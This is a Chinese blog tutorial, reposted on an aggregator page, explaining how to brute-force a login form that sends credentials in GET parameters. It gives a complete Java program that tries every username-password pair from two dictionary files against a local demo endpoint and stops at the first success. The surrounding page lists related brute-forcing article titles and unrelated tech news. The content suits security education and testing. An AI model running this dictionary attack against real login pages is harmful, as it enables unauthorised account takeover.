通过java代码实现get登录的密码暴力破解 - 代码天地

通过java代码实现get登录的密码暴力破解

其他 2020-09-07 13:35:44 阅读次数: 0

一、原理

GET请求会将参数放在URL中，如果通过GET请求登录，则会将用户名和密码放在URL中进行发送，此时我们可以通过构建URL来进行测试登录，并获取到返回的数据，来判定登录结果，来达到爆破的结果。

二、思路

我们需要通过socket的方式进行连接，并准备用户名和密码字典，依次取出字典中的值，通过两个for循环，用外层用户名，内层密码的方式构建URL，再依次发送，并接收返回的数据，判断登录结果。

此时需要注意的是，在发送了请求后，判定登录失败，则需要关闭socket，并重新建立socket进行下一次登录。

三、代码编写

public class Demo1 {
	public static void main(String[] args) throws Exception{
		//取出用户名字典中的值，存入list中
		FileInputStream fl = new FileInputStream("d:\\test\\test.txt");
		Scanner sc = new Scanner(fl);
		List list =new List();
		while(sc.hasNextLine()) {
			list.add(sc.nextLine());
		}
		//取出密码字典中的值，存入list1中
		FileInputStream fl1 = new FileInputStream("d:\\test\\test2.txt");
		Scanner sc1 = new Scanner(fl1);
		List list1 =new List();
		while(sc1.hasNextLine()) {
			list1.add(sc1.nextLine());			
		}	
		
        //利用双for循环构建URL，并在循环中开启和关闭socket
		for(int m=0;m<list.getItemCount();m++) {
			for(int n=0;n<list1.getItemCount();n++) {
				HttpClient hc =new HttpClient();
				GetMethod gm  =new GetMethod("http://127.0.0.1:8080/http/HttpDemo?userName="+list.getItem(m)+"&passWord="+list1.getItem(n));
				hc.executeMethod(gm);
				byte[] by = gm.getResponseBody();
				String string = new String(by);
				if(string.contains("成功")) {
					System.out.println("爆破成功：\r\n用户名："+list.getItem(m)+"密码："+list1.getItem(n));
					System.exit(0);
					
				}
			}
		}
	}			
}

猜你喜欢

转载自blog.csdn.net/weixin_47931795/article/details/108390976

通过java代码实现get登录的密码暴力破解

burpsuite暴力破解dvwa的登录密码

用Java代码暴力破解WIFI密码

暴力破解登录密码（登录批量发包）

Linux 系统防止ssh登录密码的暴力破解

Python暴力破解网站登录密码脚本

暴力破解LINUX密码

浅谈密码暴力破解

wifi密码暴力破解

密码暴力破解与防御

密码暴力破解与防御

密码暴力破解与防御

暴力破解wifl密码

Python实现压缩包密码暴力破解脚本（附代码）

linux密码加密方式与暴力破解代码

暴力破解密码 - C++ 递归方法实现

Python3实现WiFi密码暴力破解

暴力破解 - 密码离线破解

linux密码暴力破解机

防止暴力破解linux ssh等密码

Kali Linux 暴力破解 wifi密码

burpsuite暴力破解网站密码？

python干货----暴力破解wifi密码

windows 2008 被暴力破解了密码

Python暴力破解ZIP文件密码

强力密码暴力破解工具:hydra

python暴力破解wifi密码程序

hydra暴力破解ssh密码

Python脚本暴力破解栅栏密码

JMeter暴力破解账户密码

今日推荐

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

周排行

返回指定时间格式

fopen函数中的mode参数

Java 单例模式探讨

Flex remoteobject工作原理探讨

寻找mplayer的便捷安装方法

30天了解30种技术系列---(26)MySQL自动化运维工具Inception

关于Jboss/Tomcat/Jetty的JNDI定义123

程序减肥，strip，eu-strip 及其符号表

AsyncTask、View.post(Runnable)、ViewTreeObserver三种方式总结frame animation自动启动

Json和Bean的互相转换

每日归档

更多

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)